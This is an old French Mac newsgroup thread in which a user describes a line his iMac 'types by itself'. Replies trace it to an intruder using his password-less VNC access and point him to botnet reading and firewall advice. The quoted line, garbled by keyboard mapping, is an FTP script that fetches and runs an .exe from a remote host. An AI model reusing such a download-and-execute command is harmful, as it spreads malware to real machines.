OVH Cloud OVH Cloud

Un Virus ?

92 réponses
Avatar
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :


(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

10 réponses

1 2 3 4 5
Avatar
joly
Nina Popravka wrote:

On Sat, 3 Mar 2007 11:31:36 +0100, (arno)
wrote:

Les entêtes de ses messages...


Voilà...
Tout le NG mort de rire doit être en train de visiter son Mac :-)


C'est toi qui a commencé à lui demander de fournir en public le plan
d'accès à sa maison...
qu'il ait laissé les clés sur la porte, c'est un plus :)

--
arno


Avatar
RiGuad
Bon, donc , en recap a mon constat d'origine, ca n'aurait pas été le Mac
qui est infecté mais quelqu'un qui tapait en direct cette ligne de
commande que j'ai envoyé dans mon post d'origine, et ceci par l'acces VNC ?
Dans ce cas comment mon IP publique du moment est elle connue ?



On Sat, 3 Mar 2007 11:31:36 +0100, (arno)
wrote:

Les entêtes de ses messages...


Voilà...
Tout le NG mort de rire doit être en train de visiter son Mac :-)



Avatar
RiGuad
ah ok, l'IP est ecrite en clair dans l'en tete des messages envoyés sur NG.
L'Ip publique d'un emetteur est elle toujours inscrite dans l'entete
d'un mail recu ?

Je decouvre...

Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
publique comment ?

Bon, donc , en recap a mon constat d'origine, ca n'aurait pas été le Mac
qui est infecté mais quelqu'un qui tapait en direct cette ligne de
commande que j'ai envoyé dans mon post d'origine, et ceci par l'acces VNC ?
Dans ce cas comment mon IP publique du moment est elle connue ?



On Sat, 3 Mar 2007 11:31:36 +0100, (arno)
wrote:

Les entêtes de ses messages...


Voilà...
Tout le NG mort de rire doit être en train de visiter son Mac :-)





Avatar
RiGuad
oui, deux dossier : "Ecamm" contenau des ucs que je crois etre en rapprt
avec l'enregisrement des conversations telephoniques via Skype, et un
autre "Growl Safari"

As-tu un fichier dans le répertoire ~/Library/InputManagers ?



Avatar
jacques
Nina Popravka wrote:

Le truc est du à un virus parfaitement classique, qui installe un
backdoor qui permet de contrôler la bécane via IRC.
T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>


J'irais lire ça lundi du boulot :-)

Merci Nina.

Jacques
--
« Mac OS X Server à votre Service » en vente au Monde en Tique.
<http://www.lmet.fr/fiche.cgi?_ISBN—82952726603>
Attention, plus que 19 exemplaires.

Avatar
blanc
Nina Popravka wrote:

T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>


Très intéressant. Merci.

JPaul.
--
/==/==- Jean-Paul BLANC
/ /--/--// quelque-part (somewhere)
|/| L | en (in)
/|| = ||| FRANCE

Avatar
jperrocheau
RiGuad wrote:

Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
connexion entrante tcp port 13517, et parfois 1080.
Ces ports sont dédiés a quoi ?


<http://www.iana.org/assignments/port-numbers>

La page officielle.


Idem plus rarement connexion entrante TCP Microsoft SQL Server et
connexion entrante TCP SMB/CIFS - Windows file service.
Qu'est ce ?.

D'une facon générale , doit je bloquer toute tentative de connexion
entrante au sens ou NetBarrier l'entend ?

Little Snitch m'informe des connexions sortantes de mon Mac, et c'est
d'ailleurs la que j'ai decouvert que Mon Mac et Crosoft tchattaient
grave a mon insu.
Mais Des connexions entrante honnetes, ca peut etre quoi ?


Plutôt que d'installer des multiples couches de préservatifs, plus ou
moins facile à paramétrer, tu pourrais simplement activer le firewall de
Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
important est de paraméter le firewall de ton routeur.


--
Jacques PERROCHEAU
________________________________________________________________________
e-mail: mailto:

Avatar
blanc
Jacques Perrocheau wrote:

RiGuad wrote:

Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
connexion entrante tcp port 13517, et parfois 1080.
Ces ports sont dédiés a quoi ?


<http://www.iana.org/assignments/port-numbers>

La page officielle.


Oui, mais 13517 fait partie des "unassigned" :-(

JPaul.
--
/==/==- Jean-Paul BLANC
/ /--/--// quelque-part (somewhere)
|/| L | en (in)
/|| = ||| FRANCE


Avatar
RiGuad
Je voudrais remercier tout le monde des informations transmises ici et
qui m'ont beaucoup instruit.
En particulier le temps que m'a accordé Nina qui ... s'il est certain
que sa maniere de s'exprimer se veut resolument antipédagogique, m'a
permi de comprendre bien des choses inquietantes pour certaines.
Merci de comprendre aussi que l'usage du Net est grand public, et que si
l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
mais un Macounet qui veut comprendre, d'ou mes questions qui ont du
paraitre betes a certains..., et que les concepts et termes que vous
employez, s'ils demontrent vos compétences en la matière ont bien des
recherches de ma part pour simplement en comprendre le sens.
Les réponses aux questions en amenent une foultitude d'autres, et je ne
voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils
spécifiques a mes questions...
Merci aussi des docs referentiels fournis... l'assignation des ports,
meme si elle n'est que théorique il est vrai, et ce truc sur les
botnets, passionnant.
J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
de base terrible concernant l'acces a leur machine par n'importe qui, et
je me dis que , entre les Virus connus, ceux qui ne le sont pas, les
bugs logiciels, le merdier Winsoft qui equipe leur machine,
l'incertitude d'un bon usage , etc... il doit etre bien difficile ,
quand on a un pc et qu'on constate un fonctionnement anormal, de savoir
ce qui ne va pas.

TiPunch tropical a tous...


Nina Popravka wrote:

T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>


Très intéressant. Merci.

JPaul.



Avatar
Nicolas.MICHEL
RiGuad wrote:

Merci de comprendre aussi que l'usage du Net est grand public, et que si
l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
mais un Macounet qui veut comprendre, d'ou mes questions qui ont du
paraitre betes a certains...


La seule bêtise que tu aies faite était de ne pas mettre de mot de passe
sur VNC.

Les questions ne sont jamais bête et surtout pas les questions que tu
t'es posées dans ce fil. Dureste on a certainement été nombreux à
aprendre des trucs grâce à toi (et aux réponses qui t'on été données)

et que les concepts et termes que vous
employez, s'ils demontrent vos compétences en la matière ont bien des
recherches de ma part pour simplement en comprendre le sens.


Par principe comme par flemme, on ne présuppose pas de niveau de son
interlocuteur quand on réponds. Ce serait présomptueux de notre part.
Et puis un problème technique amène des réponses techniques.
Si tu ne comprends pas un truc, demandes des précisions.

Les réponses aux questions en amenent une foultitude d'autres, et je ne
voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils
spécifiques a mes questions...


Ce forum est le bon endroit pour tes questions.
Dumoins je n'en connais pas de meilleur.
Simplement ça demande effectivement un peu de temps pour analyser les
réponses et les comprendre. Au besoins, je me répète, tu peux demander
des éclairsissements ou même un résumé de ce que tu dois faire pour
régler ton problème.

J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
de base terrible concernant l'acces a leur machine par n'importe qui


Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
défaut un utilisateur "admin" sans mots de passe ?
Bin oui, c'est super sécurisé M$ :>

et je me dis que , entre les Virus connus, ceux qui ne le sont pas, les
bugs logiciels, le merdier Winsoft qui equipe leur machine, l'incertitude
d'un bon usage , etc... il doit etre bien difficile , quand on a un pc et
qu'on constate un fonctionnement anormal, de savoir ce qui ne va pas.


Attends, tu ne voudrais tout de même pas enlever le pain de la bouche
des informaticiens en faisant des ordinateurs fiables ?
Dureste, si le grand public n'aimait pas les suprises M$ n'aurait pas
une telles part de marché.

--
Nicolas

1 2 3 4 5